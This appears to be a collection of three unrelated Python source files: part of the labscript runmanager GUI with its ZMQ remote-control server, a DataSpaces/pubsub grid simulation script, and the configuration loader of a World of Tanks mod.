set_expansion_type_guess(expansion_types, expansions, global_name, str(global_name))
for global_name in sorted(self.previous_expansion_types):
if (not global_depends_on_global_with_outer_product(
global_name, self.previous_global_hierarchy, self.previous_expansions)
and not isinstance(self.previous_expansion_types[global_name]['value'], runmanager.ExpansionError)):
old_dependencies = find_dependencies(global_name, self.previous_global_hierarchy, self.previous_expansion_types)
# if this global has other globals that use it, then add them
# all to a zip group with the name of this global
if old_dependencies:
for dependency in old_dependencies:
if dependency in expansion_types:
set_expansion_type_guess(expansion_types, self.previous_expansions, dependency, str(global_name), new=False)
if global_name in expansion_types:
set_expansion_type_guess(expansion_types, self.previous_expansions, global_name, str(global_name), new=False)
for global_name, guesses in expansion_types.items():
if guesses['new_guess'] != guesses['previous_guess']:
filename = active_groups[guesses['group_name']]
runmanager.set_expansion(
filename, str(guesses['group_name']), str(global_name), str(guesses['new_guess']))
expansions[global_name] = guesses['new_guess']
expansion_types_changed = True
# Now check everything that has an expansion type not equal to outer.
# If it has one but is not iterable, remove it from the zip group.
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
if expansions[global_name] and expansions[global_name] != 'outer':
try:
iter(evaled_globals[group_name][global_name])
except Exception:
filename = active_groups[group_name]
runmanager.set_expansion(filename, group_name, global_name, '')
expansion_types_changed = True
self.previous_evaled_globals = evaled_globals
self.previous_global_hierarchy = global_hierarchy
self.previous_expansion_types = expansion_types
self.previous_expansions = expansions
return expansion_types_changed
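# Illustrative example (hypothetical globals): if a global 'x' evaluates to
# [1, 2, 3] (guessed as 'outer') and another global 'y' is defined as 'x**2',
# this method places both in a zip group named 'x', so shots pair x[i] with
# y[i] rather than taking the outer product of the two lists.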
def make_h5_files(self, labscript_file, output_folder, sequence_globals, shots, shuffle):
sequence_attrs, default_output_dir, filename_prefix = runmanager.new_sequence_details(
labscript_file, config=self.exp_config, increment_sequence_index=True
)
if output_folder == self.previous_default_output_folder:
# The user is using the default output folder. Just in case the sequence
# index has been updated or the date has changed, use the default_output_dir
# obtained from new_sequence_details, as it is race-free, whereas the one
# from the UI may be out of date since we only update it once a second.
output_folder = default_output_dir
self.check_output_folder_update()
run_files = runmanager.make_run_files(
output_folder,
sequence_globals,
shots,
sequence_attrs,
filename_prefix,
shuffle,
)
logger.debug(run_files)
return labscript_file, run_files
def send_to_BLACS(self, run_file, BLACS_hostname):
port = int(self.exp_config.get('ports', 'BLACS'))
agnostic_path = shared_drive.path_to_agnostic(run_file)
self.output_box.output('Submitting run file %s.\n' % os.path.basename(run_file))
try:
response = zmq_get(port, BLACS_hostname, data=agnostic_path)
if 'added successfully' in response:
self.output_box.output(response)
else:
raise Exception(response)
except Exception as e:
self.output_box.output('Couldn\'t submit job to control server: %s\n' % str(e), red=True)
self.compilation_aborted.set()
def send_to_runviewer(self, run_file):
runviewer_port = int(self.exp_config.get('ports', 'runviewer'))
agnostic_path = shared_drive.path_to_agnostic(run_file)
try:
response = zmq_get(runviewer_port, 'localhost', data='hello', timeout=1)
if 'hello' not in response:
raise Exception(response)
except Exception as e:
logger.info('runviewer not running, attempting to start...')
# Runviewer not running, start it:
if os.name == 'nt':
creationflags = 0x00000008 # DETACHED_PROCESS from the win32 API
subprocess.Popen([sys.executable, '-m', 'runviewer'],
creationflags=creationflags, stdout=None, stderr=None,
close_fds=True)
else:
devnull = open(os.devnull, 'w')
if not os.fork():
os.setsid()
subprocess.Popen([sys.executable, '-m', 'runviewer'],
stdin=devnull, stdout=devnull, stderr=devnull, close_fds=True)
os._exit(0)
try:
zmq_get(runviewer_port, 'localhost', data='hello', timeout=15)
except Exception as e:
self.output_box.output('Couldn\'t submit shot to runviewer: %s\n\n' % str(e), red=True)
try:
response = zmq_get(runviewer_port, 'localhost', data=agnostic_path, timeout=0.5)
if 'ok' not in response:
raise Exception(response)
else:
self.output_box.output('Shot %s sent to runviewer.\n' % os.path.basename(run_file))
except Exception as e:
self.output_box.output('Couldn\'t submit shot to runviewer: %s\n\n' % str(e), red=True)
class RemoteServer(ZMQServer):
def __init__(self):
port = app.exp_config.getint(
'ports', 'runmanager', fallback=runmanager.remote.DEFAULT_PORT
)
ZMQServer.__init__(self, port=port)
def handle_get_globals(self, raw=False):
active_groups = inmain(app.get_active_groups, interactive=False)
sequence_globals = runmanager.get_globals(active_groups)
all_globals = {}
if raw:
for group_globals in sequence_globals.values():
values_only = {name: val for name, (val, _, _) in group_globals.items()}
all_globals.update(values_only)
else:
evaled_globals, global_hierarchy, expansions = runmanager.evaluate_globals(
sequence_globals, raise_exceptions=False
)
for group_globals in evaled_globals.values():
all_globals.update(group_globals)
return all_globals
@inmain_decorator()
def handle_set_globals(self, globals, raw=False):
active_groups = app.get_active_groups(interactive=False)
sequence_globals = runmanager.get_globals(active_groups)
try:
for global_name, new_value in globals.items():
# Unless raw=True, convert to str representation for saving to the GUI
# or file. If this does not result in an object the user can actually
# use, evaluation will error and the caller will find out about it later
if not raw:
new_value = repr(new_value)
elif not isinstance(new_value, (str, bytes)):
msg = "global %s must be a string if raw=True, not %s"
raise TypeError(msg % (global_name, new_value.__class__.__name__))
# Find the group this global is in:
for group_name, group_globals in sequence_globals.items():
globals_file = active_groups[group_name]
if global_name in group_globals:
# Confirm it's not also in another group:
for other_name, other_globals in sequence_globals.items():
if other_globals is not group_globals:
if global_name in other_globals:
msg = """Cannot set global %s, it is defined in
multiple active groups: %s and %s"""
msg = msg % (global_name, group_name, other_name)
raise RuntimeError(dedent(msg))
previous_value, _, _ = sequence_globals[group_name][global_name]
# Append expression-final comments in the previous expression to
# the new one:
comments = runmanager.find_comments(previous_value)
if comments:
# Only the final comment
comment_start, comment_end = comments[-1]
# Only if the comment is the last thing in the expression:
if comment_end == len(previous_value):
new_value += previous_value[comment_start:comment_end]
try:
# Is the group open?
group_tab = app.currently_open_groups[
globals_file, group_name
]
except KeyError:
# Group is not open. Change the global value on disk:
runmanager.set_value(
globals_file, group_name, global_name, new_value
)
else:
# Group is open. Change the global value via the GUI:
group_tab.change_global_value(
global_name,
previous_value,
new_value,
interactive=False,
)
break
else:
# Global was not found.
msg = "Global %s not found in any active group" % global_name
raise ValueError(msg)
finally:
# Trigger preparsing of globals to occur so that changes in globals not in
# open tabs are reflected in the GUI, such as n_shots, errors on other
# globals that depend on them, etc.
app.globals_changed()
def handle_engage(self):
app.wait_until_preparse_complete()
inmain(app.on_engage_clicked)
@inmain_decorator()
def handle_abort(self):
app.on_abort_clicked()
@inmain_decorator()
def handle_get_run_shots(self):
return app.ui.checkBox_run_shots.isChecked()
@inmain_decorator()
def handle_set_run_shots(self, value):
app.ui.checkBox_run_shots.setChecked(value)
@inmain_decorator()
def handle_get_view_shots(self):
return app.ui.checkBox_view_shots.isChecked()
@inmain_decorator()
def handle_set_view_shots(self, value):
app.ui.checkBox_view_shots.setChecked(value)
@inmain_decorator()
def handle_get_shuffle(self):
return app.ui.pushButton_shuffle.isChecked()
@inmain_decorator()
def handle_set_shuffle(self, value):
app.ui.pushButton_shuffle.setChecked(value)
def handle_n_shots(self):
# Wait until any current preparsing is done, to ensure this is not racy w.r.t
# previous remote calls:
app.wait_until_preparse_complete()
return app.n_shots
@inmain_decorator()
def handle_get_labscript_file(self):
labscript_file = app.ui.lineEdit_labscript_file.text()
return os.path.abspath(labscript_file)
@inmain_decorator()
def handle_set_labscript_file(self, value):
labscript_file = os.path.abspath(value)
app.ui.lineEdit_labscript_file.setText(labscript_file)
@inmain_decorator()
def handle_get_shot_output_folder(self):
shot_output_folder = app.ui.lineEdit_shot_output_folder.text()
return os.path.abspath(shot_output_folder)
@inmain_decorator()
def handle_set_shot_output_folder(self, value):
shot_output_folder = os.path.abspath(value)
app.ui.lineEdit_shot_output_folder.setText(shot_output_folder)
def handle_error_in_globals(self):
try:
# This will raise an exception if there are multiple active groups of the
# same name:
active_groups = inmain(app.get_active_groups, interactive=False)
sequence_globals = runmanager.get_globals(active_groups)
# This will raise an exception if any of the globals can't be evaluated:
runmanager.evaluate_globals(sequence_globals, raise_exceptions=True)
except Exception:
return True
return False
def handle_is_output_folder_default(self):
return not app.non_default_folder
@inmain_decorator()
def handle_reset_shot_output_folder(self):
app.on_reset_shot_output_folder_clicked(None)
def handler(self, request_data):
cmd, args, kwargs = request_data
if cmd == 'hello':
return 'hello'
elif cmd == '__version__':
return runmanager.__version__
try:
return getattr(self, 'handle_' + cmd)(*args, **kwargs)
except Exception as e:
msg = traceback.format_exc()
msg = "Runmanager server returned an exception:\n" + msg
return e.__class__(msg)
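# Requests arrive as a (cmd, args, kwargs) tuple. For example, a hypothetical
# client request ('set_globals', [{'x': 5.0}], {'raw': False}) is dispatched
# to self.handle_set_globals({'x': 5.0}, raw=False); an unknown cmd raises
# AttributeError, which is returned to the caller wrapped in the traceback
# message above.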
if __name__ == "__main__":
logger = setup_logging('runmanager')
labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
qapplication = QtWidgets.QApplication(sys.argv)
qapplication.setAttribute(QtCore.Qt.AA_DontShowIconsInMenus, False)
app = RunManager()
splash.update_text('Starting remote server')
remote_server = RemoteServer()
splash.hide()
qapplication.exec_()
remote_server.shutdown()
|
sim.py
|
# write to staging service
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import math
import numpy
from pyevtk.hl import imageToVTK
import os
import shutil
import copy
import random
import time
import ctypes
from mpi4py import MPI
import dataspaces.dataspaceClient as dataspaces
import sys
# import the pubsub client so events can be published/detected after every iteration
sys.path.append('../../../src/publishclient/pythonclient')
import pubsub as pubsubclient
import timeit
sys.path.append('../../../src/metadatamanagement/pythonclient')
import metaclient
from threading import Thread
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
# init dataspace client
# copy all conf.* files to the current dir
serverdir = "/home1/zw241/dataspaces/tests/C"
confpath = serverdir+"/conf*"
copyCommand = "cp "+confpath+" ."
os.system(copyCommand)
# number of clients at the client end that join the server
num_peers= 2
appid = 1
var_name = "ex1_sample_data"
#lock_name = "my_test_lock_"+str(rank)
lock_name = "my_test_lock"
ds = dataspaces.dataspaceClient(appid,comm)
pubsubaddrList = pubsubclient.getServerAddr()
print (pubsubaddrList)
pubsubAddr = pubsubaddrList[0]
#pubsubaddrList = pubsubclient.getServerAddr()
#print (pubsubaddrList)
#pubsubAddr = pubsubaddrList[0]
def putDataToDataSpaces(gridList,timestep):
cellDataArray=[]
for i in range (len(gridList)):
#print gridList[i].p
cellDataArray.append(gridList[i].p*1.0)
#ds.dspaces_lock_on_write(lock_name)
# elemsize = ctypes.sizeof(ctypes.c_double)
# data = ([[1.1,2.2,3.3],[4.4,5.5,6.6]])
# dataarray = (ver+1)*numpy.asarray(data)
ver = timestep
# data is a 1-D array
if(rank==0):
lb = [0]
if (rank ==1):
lb = [3380]
#ds.lock_on_write(lock_name)
ds.put(var_name,ver,lb,cellDataArray)
#ds.unlock_on_write(lock_name)
#print("write to dataspaces for ts %d" % (timestep))
def sendEventToPubSub(pubsubAddr, ts):
eventList = ["variable_1"]
# this should be deleted
clientId = "test" + "_" + str(ts)
metainfo = "GRID[<0,0>:<1,1>]%TS["+str(ts)+"]"
matchtype= "META_GRID"
print("debug clientid %s metainfo %s matchtype %s"%(clientId,metainfo,matchtype))
pubsubclient.publishEventList(pubsubAddr,eventList,clientId,metainfo,matchtype)
print("pubsubclient %s ok"%(clientId))
#prifix = "./image"
#if os.path.isdir(prifix):
# shutil.rmtree(prifix)
#os.mkdir(prifix)
#define grid
class Grid:
def __init__(self, p, ux, uy, uz, lb, ub):
self.p = p
self.ux = ux
self.uy = uy
self.uz = uz
self.lb = lb
self.ub = ub
def __repr__(self):
return repr((self.p, self.ux, self.uy, self.uz, self.lb,self.ub))
r = 15
xlimit = r
ylimit = r
zlimit = r
gridnum=15
deltar=1.0*r/gridnum
massR = 4
lbx = -r*1.0
lby = -r*1.0
lbz = -r*1.0
ubx = r*1.0
uby = r*1.0
ubz = r*1.0
deltat=1
initux=0
inituy=0
inituz=1
constantVFiled = [initux,inituy,inituz]
initp = 1.5
# boundary p
boundp = initp*(-5)
class ColorMass:
massOrigin=[]
massR = massR
p = initp
ifFirstHappen = False
def checkAndPublishEvent(gridListNew,iteration):
ifTargetEventHappen = True
massOriginInterest = [6,0,6]
targetValue = 7.5
# put the analysis into the simulation part
for i in range (massOriginInterest[0],massOriginInterest[0]+massR):
for j in range (massOriginInterest[1],massOriginInterest[1]+massR):
for k in range (massOriginInterest[2],massOriginInterest[2]+massR):
#print "index i j k (%d %d %d)" % (i,j,k)
#print nparray[i][j][k]
#print "index i j k (%d %d %d)" % (i,j,k)
#print nparray[i][j][k]
index = getIndex(i,j,k)
if (gridListNew[index].p!=targetValue):
ifTargetEventHappen = False
break
if ifTargetEventHappen:
print (iteration)
# send publish event
event = "CUBIC_DETECTED"
meta = str(iteration)
detecttime = timeit.default_timer()
print (detecttime)
pubsubclient.initAddrAndPublish(event,meta)
ifFirstHappen = True
return
# detect whether the point (px, py, pz) is inside the mass body
def inMassBody(px,py,pz,massOrigin,t,currIndex):
upbdx = massOrigin[0]+deltar*massR
upbdy = massOrigin[1]+deltar*massR
upbdz = massOrigin[2]+deltar*massR
#if (t>=5 and t <= 7 and currIndex%100 ==11):
# print "inMassBody"
# print [px,py,pz]
# print massOrigin
# print [upbdx,upbdy,upbdz]
if (px >= massOrigin[0] and px <= upbdx and py >=massOrigin[1] and py <= upbdy and pz >=massOrigin[2] and pz <= upbdz):
return True
else:
return False
def ifOutBoundForNextStep(massOrigin,t,currIndex):
# calculate the position for the next step
nextx = massOrigin[0]+deltat*constantVFiled[0]
nexty = massOrigin[1]+deltat*constantVFiled[1]
nextz = massOrigin[2]+deltat*constantVFiled[2]
bxlpx=0
bxlby=0
bxlbz=0
# check the eight corner points
bxupx=r
bxupy=r
bxupz=r
# return True if any of the eight corner points falls outside the boundary
if nextx<bxlpx or nextx>bxupx or nexty<bxlby or nexty>bxupy or nextz<bxlbz or nextz>bxupz:
return True
checkx=nextx+massR*deltar
checky=nexty
checkz=nextz
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx
checky=nexty+massR*deltar
checkz=nextz
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx
checky=nexty
checkz=nextz+massR*deltar
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx
checky=nexty+massR*deltar
checkz=nextz+massR*deltar
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx+massR*deltar
checky=nexty
checkz=nextz+massR*deltar
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx+massR*deltar
checky=nexty+massR*deltar
checkz=nextz
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx+massR*deltar
checky=nexty+massR*deltar
checkz=nextz+massR*deltar
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
return False
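# An equivalent, more compact check (illustrative sketch only, not used by
# the code above): iterate over the eight corner offsets instead of
# unrolling them by hand.
#
#   def ifOutBoundForNextStepCompact(massOrigin):
#       nextpos = [massOrigin[i] + deltat * constantVFiled[i] for i in range(3)]
#       for dx in (0, massR * deltar):
#           for dy in (0, massR * deltar):
#               for dz in (0, massR * deltar):
#                   x = nextpos[0] + dx
#                   y = nextpos[1] + dy
#                   z = nextpos[2] + dz
#                   if not (0 <= x <= r and 0 <= y <= r and 0 <= z <= r):
#                       return True
#       return False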
def boundryDetect(gridListObj):
# detect collision
# update the velocity
# collision x direction 1
# collision y direction 2
# collision z direction 3
collisionFace = []
pcpx = gridListObj.lb[0] + deltar/2
pcpy = gridListObj.lb[1] + deltar/2
pcpz = gridListObj.lb[2] + deltar/2
cux =gridListObj.ux
cuy =gridListObj.uy
cuz =gridListObj.uz
newx = pcpx+cux*deltat
newy = pcpy+cuy*deltat
newz = pcpz+cuz*deltat
if (newx > gridnum*deltar) or (newx < 0):
collisionFace.append(1)
if (newy > gridnum*deltar) or (newy < 0):
collisionFace.append(2)
if (newz > gridnum*deltar) or (newz < 0):
collisionFace.append(3)
return collisionFace
# the effect of the collision has been added
def updateGridValue(gridListOld,gridListNew,currIndex,t,redmassOrigin,bluemassOrigin):
rmassLb = [redmassOrigin[0]-massR/2.0,redmassOrigin[1]-massR/2.0,redmassOrigin[2]-massR/2.0]
bmassLb = [bluemassOrigin[0]-massR/2.0,bluemassOrigin[1]-massR/2.0,bluemassOrigin[2]-massR/2.0]
zgridindex = int(gridListNew[currIndex].lb[2])
ygridindex = int(gridListNew[currIndex].lb[1])
xgridindex = int(gridListNew[currIndex].lb[0])
# get curr u (velocity)
#cux = gridListNew[currIndex].ux
#cuy = gridListNew[currIndex].uy
#cuz = gridListNew[currIndex].uz
cux = constantVFiled[0]
cuy = constantVFiled[1]
cuz = constantVFiled[2]
# get curr p
pcpx = gridListNew[currIndex].lb[0] + deltar/2
pcpy = gridListNew[currIndex].lb[1] + deltar/2
pcpz = gridListNew[currIndex].lb[2] + deltar/2
# get old value position
oldx = pcpx - deltat*cux
oldy = pcpy - deltat*cuy
oldz = pcpz - deltat*cuz
oldpIndex = getIndex(oldx,oldy,oldz)
newpIndex = getIndex(pcpx,pcpy,pcpz)
# in flow for one time step
# oldx oldy oldz at the outside p = 0
# clamping case, the p value should be 0
if oldpIndex == -1:
gridListNew[newpIndex].p = initp
return
# if the body is out of the box
# when the point is in the body
# do not update
redifout = ifOutBoundForNextStep(rmassLb,t,currIndex)
blueifout = ifOutBoundForNextStep(bmassLb,t,currIndex)
#if (t>=4 and t <= 6 and currIndex%100 ==11):
# print t
# print massLb
# print ifout
if (redifout == True or blueifout == True) and gridListNew[currIndex].p != initp:
rifinBody = inMassBody(pcpx,pcpy,pcpz,rmassLb,t,currIndex)
bifinBody = inMassBody(pcpx,pcpy,pcpz,bmassLb,t,currIndex)
#if (t>=4 and t <= 7 and currIndex%100 ==11):
# print "ifinBody currIndex"
# print [ifinBody,currIndex]
if rifinBody==True or bifinBody==True:
#do not move if the condition is true
return
else:
gridListNew[newpIndex].p = gridListOld[oldpIndex].p
else:
gridListNew[newpIndex].p = gridListOld[oldpIndex].p
"""
# if on boundry
for dis in range (massR):
if (zgridindex==(gridnum-1-dis)):
# not move
# if current if updated value
# do not update
# if next 2 level is boundry do not update
disIndex = currIndex+dis*gridnum*gridnum
# TODO adjust if collision
if gridListNew[disIndex].p != initp:
print "t %d curr index%d" % (t,currIndex)
print [xgridindex,ygridindex,zgridindex]
return
"""
#if (t>=5 and t <= 9 and currIndex==912):
# print "after updating"
# print [gridListNew[newpIndex].p,gridListOld[oldpIndex].p]
def generateImage(gridList,filename):
cellData=[]
for i in range (len(gridList)):
#print gridList[i].p
cellData.append(gridList[i].p)
pressure=numpy.asarray(cellData).reshape(gridnum, gridnum, gridnum,order='F')
#print pressure
imageToVTK(filename, cellData = {"pressure" : pressure})
# take the coordinates of a point and return the index of its grid cell in the array
def getIndex(px,py,pz):
# TODO: should handle all boundary cases
# only handles the lower boundary case
if (px<0 or py <0 or pz<0 or px > gridnum*deltar or py > gridnum*deltar or pz > gridnum*deltar):
#print "out of the box "
#print [px,py,pz]
return -1
gnumx=math.floor((px-0)/deltar)
gnumy=math.floor((py-0)/deltar)
gnumz=math.floor((pz-0)/deltar)
index = int(gnumz*gridnum*gridnum + gnumy*gridnum+gnumx)
return index
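# Worked example with the values defined above (deltar = 1.0, gridnum = 15):
# getIndex(2.5, 0.5, 1.5) gives gnumx=2, gnumy=0, gnumz=1, so
# index = 1*15*15 + 0*15 + 2 = 227.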
gridList=[]
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
# init color mass
redmass = ColorMass()
redmass.massOrigin=[1+redmass.massR/2,1+redmass.massR/2,1+redmass.massR/2]
redmass.p = initp*(5)
bluemass = ColorMass()
bluemass.massOrigin = [8+bluemass.massR/2,1+bluemass.massR/2,1+bluemass.massR/2]
bluemass.p = initp*(-5)
# generate array of grid and init lb and ub
for zi in range (gridnum):
gridlbz = zi*deltar
for yi in range (gridnum):
gridlby = yi*deltar
for xi in range (gridnum):
gridlbx=xi*deltar
gridobj = Grid(initp,constantVFiled[0],constantVFiled[1],constantVFiled[2],[gridlbx,gridlby,gridlbz],[gridlbx+deltar,gridlby+deltar,gridlbz+deltar])
gridList.append(gridobj)
#plt.plot(gridlbx,gridlby,gridlbz,'k.')
ax.scatter(gridlbx, gridlby, gridlbz, color='k',marker='.')
# show grid data
plt.axis('scaled')
#plt.show()
# init the value at the grid center
for i in range (len(gridList)):
# add boundary condition
#zindex = i / (gridnum*gridnum)
#yindex = (i % (gridnum*gridnum))/gridnum
#xindex = (i % (gridnum*gridnum) % gridnum)
zindex = gridList[i].lb[2]
yindex = gridList[i].lb[1]
xindex = gridList[i].lb[0]
if xindex==0 or xindex ==(gridnum-1) or yindex==0 or yindex==(gridnum-1) or zindex==0 or zindex==(gridnum-1):
# boundary condition for p value and v value
#gridList[i].p=boundp
gridList[i].p=initp
#if (xindex==0 or xindex ==(gridnum-1)):
#gridList[i].ux = 0
# print "x boundry"
#if (yindex==0 or yindex==(gridnum-1)):
#gridList[i].uy = 0
# print "y boundry"
#if (zindex==0 or zindex==(gridnum-1)):
#gridList[i].uz = inituz / 2.0
#gridList[i].ux = 1
# print "z boundry"
# init condition
# generate init color mass
rmassLb = [redmass.massOrigin[0]-massR/2.0,redmass.massOrigin[1]-massR/2.0,redmass.massOrigin[2]-massR/2.0]
rmassUb = [redmass.massOrigin[0]+massR/2.0,redmass.massOrigin[1]+massR/2.0,redmass.massOrigin[2]+massR/2.0]
if (xindex >= rmassLb[0] and xindex <= rmassUb[0]-deltar and yindex>=rmassLb[1] and yindex<=rmassUb[1]-deltar and zindex>=rmassLb[2] and zindex<=rmassUb[2]-deltar) :
# update p value
gridList[i].p=redmass.p
# update velocity
gridList[i].ux = constantVFiled[0]
gridList[i].uy = constantVFiled[1]
gridList[i].uz = constantVFiled[2]
bmassLb = [bluemass.massOrigin[0]-massR/2.0,bluemass.massOrigin[1]-massR/2.0,bluemass.massOrigin[2]-massR/2.0]
bmassUb = [bluemass.massOrigin[0]+massR/2.0,bluemass.massOrigin[1]+massR/2.0,bluemass.massOrigin[2]+massR/2.0]
'''
if (xindex >= bmassLb[0] and xindex <= bmassUb[0]-deltar and yindex>=bmassLb[1] and yindex<=bmassUb[1]-deltar and zindex>=bmassLb[2] and zindex<=bmassUb[2]-deltar) :
# update p value
gridList[i].p=bluemass.p
# update velocity
gridList[i].ux = constantVFiled[0]
gridList[i].uy = constantVFiled[1]
gridList[i].uz = constantVFiled[2]
'''
#print "debug"
#print [xindex,yindex,zindex]
#if (i >=6 and i < 8) :
# gridList[i].p=initp*(-2)
# update the p in grid array
# ten timesteps
gridListNew = gridList
# trace the position of the mass origin
massOriginNew = redmass.massOrigin
def updateGridValueFake(gridListInput,ifcenter):
if ifcenter:
# update the center; other parts keep the init value
massOriginInterest=[7,7,7]
else:
# update the left region (the red mass moves there); other parts keep the init value
massOriginInterest=[2,2,2]
rmassLb = [massOriginInterest[0]-massR/2.0,massOriginInterest[1]-massR/2.0,massOriginInterest[2]-massR/2.0]
for i in range (len(gridList)):
zindex = gridList[i].lb[2]
yindex = gridList[i].lb[1]
xindex = gridList[i].lb[0]
gridList[i].p = initp*(-5)
if (xindex >= rmassLb[0] and xindex <= rmassLb[0]+massR and yindex>=rmassLb[1] and yindex<=rmassLb[1]+massR and zindex>=rmassLb[2] and zindex<=rmassLb[2]+massR) :
# update p value
gridList[i].p=redmass.p
# simulate the time taken to calculate the data
time.sleep(0.1)
if (len(sys.argv)!=3):
print("simulation <iteration> <when interesting thing happen>")
exit(0)
iteration = int(sys.argv[1])
changeVPeriod = int(sys.argv[2])
vsign = 1
startsim = timeit.default_timer()
def threadFunction():
# check the meta periodically
addrList =metaclient.getServerAddr()
addr = addrList[0]
# poll until the value is no longer NULL
while(1):
value=metaclient.getMeta(addr, "meaningless")
if(value=="NULL"):
time.sleep(0.1)
continue
else:
break
endsim = timeit.default_timer()
print("data is becoming meaningless, time span")
print (endsim-startsim)
metaclient.putMeta(addr, "simend", "simendInfo")
os._exit(0)
thread = Thread(target = threadFunction)
thread.start()
print("start the thread watching the metaserver")
# send record to clock service
addrList=metaclient.getServerAddr()
addr = addrList[0]
metaclient.Recordtime(addr, "SIM")
for t in range (iteration):
moveToCenter = False
if (t>=changeVPeriod and t%changeVPeriod==0):
moveToCenter = True
updateGridValueFake(gridList,moveToCenter)
putDataToDataSpaces(gridListNew,t)
ds.finalize()
MPI.Finalize()
endsim = timeit.default_timer()
print("time span")
print (endsim-startsim)
|
mod_dir_indicator_extended115.py
|
# -*- coding: utf-8 -*-
import datetime
import re
import os
import json
import codecs
import urllib2
import urllib
import threading
from tutorial.control.battle.functional import IDirectionIndicator
from Avatar import PlayerAvatar
from constants import AUTH_REALM
import BigWorld
from gui.Scaleform.daapi.view.lobby.hangar.Hangar import Hangar
from gui.battle_control import g_sessionProvider
from gui import DEPTH_OF_Aim
from gui.Scaleform.Flash import Flash
from gui.Scaleform.Battle import Battle
# noinspection PyUnresolvedReferences
from Math import Vector3, Matrix
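# Config: loads (or recreates) the JSON config under res_mods/configs/spoter_mods/,
# handles RU/EN localisation, debug logging and the Google Analytics ping.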
class Config(object):
def __init__(self):
self.enable = True
self.debug = False
self.ru = True if 'RU' in AUTH_REALM else False
self.version = 'v1.15(18.11.2015)'
self.author = 'by spoter, Thx to Lp()rtii'
self.description = 'dir_indicator_extended'
self.description_ru = 'Мод: "Тылы"'
self.author_ru = 'автор: spoter, спасибо! Lp()rtii'
self.name = 'dir_indicator_extended'
self.description_analytics = 'Мод: "Тылы"'
self.tid = 'UA-57975916-14'
self.setup = {'MODIFIER': {'MODIFIER_NONE': 0, 'MODIFIER_SHIFT': 1, 'MODIFIER_CTRL': 2, 'MODIFIER_ALT': 4}}
self.sys_mes = {}
self._thread_analytics = None
self.analytics_started = False
self.language = None
self.xvm_installed = False
self.xvm_check()
self.res_mods = self.res_mods_init()
self.data = {}
self.default_config()
new_config = self.load_json(self.name, self.data)
self.data = new_config
if 'Русский' in self.data['config'].get('language'): self.ru = True
if self.ru:
self.description = self.description_ru
self.author = self.author_ru
@staticmethod
def res_mods_init():
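        # strip the last three path components from this file's directory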
wd = os.path.dirname(os.path.realpath(__file__))
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
return wd
def xvm_check(self):
try:
#
import xvm_main
self.xvm_installed = True
except StandardError:
pass
def default_config(self):
self.data = {
'config': {
'enable': True, 'debug': False, 'primary_indication': True, 'secondary_indication': True, 'max_distance_primary_indication': 150, 'max_distance_secondary_indication': 707,
'strategic_fear_mode': False, 'red_to_purple_indication': True, 'distance_indicator': True, 'tank_name_indicator': True, 'language': 'Русский'
}, 'language': {'Русский': {}, 'English': {}}
}
def do_config(self):
self.enable = self.data['config'].get('enable', False)
self.debug = self.data['config'].get('debug', False)
if self.data['config'].get('language') in self.data['language']:
self.language = self.data['language'].get(self.data['config'].get('language'))
else:
self.data['config']['language'] = 'English'
self.language = self.data['language'].get('English')
def byte_ify(self, inputs):
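        # recursively encode unicode strings inside dicts/lists to utf-8 byte strings (Python 2)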
if inputs:
if isinstance(inputs, dict):
return {self.byte_ify(key): self.byte_ify(value) for key, value in inputs.iteritems()}
elif isinstance(inputs, list):
return [self.byte_ify(element) for element in inputs]
elif isinstance(inputs, unicode):
return inputs.encode('utf-8')
else:
return inputs
return inputs
@staticmethod
def json_comments(text):
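        # strip full-line and inline '#' / '//' comments so the text can be parsed by json.loads()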
regex = r'\s*(#|\/{2}).*$'
regex_inline = r'(:?(?:\s)*([A-Za-z\d\.{}]*)|((?<=\").*\"),?)(?:\s)*(((#|(\/{2})).*)|)$'
lines = text.split('\n')
excluded = []
for index, line in enumerate(lines):
if re.search(regex, line):
if re.search(r'^' + regex, line, re.IGNORECASE):
excluded.append(lines[index])
elif re.search(regex_inline, line):
lines[index] = re.sub(regex_inline, r'\1', line)
for line in excluded:
lines.remove(line)
return '\n'.join(lines)
def load_json(self, name, config_old, save=False):
config_new = config_old
path = './res_mods/configs/spoter_mods/%s/' % self.name
if not os.path.exists(path):
os.makedirs(path)
new_path = '%s%s.json' % (path, name)
if save:
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
else:
if os.path.isfile(new_path):
try:
with codecs.open(new_path, 'r', encoding='utf-8-sig') as json_file:
data = self.json_comments(json_file.read().decode('utf-8-sig'))
config_new = self.byte_ify(json.loads(data))
json_file.close()
except Exception as e:
self.sys_mess()
print '%s%s' % (self.sys_mes['ERROR'], e)
else:
self.sys_mess()
print '%s[%s, %s %s]' % (self.sys_mes['ERROR'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG'])
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG_DONE'])
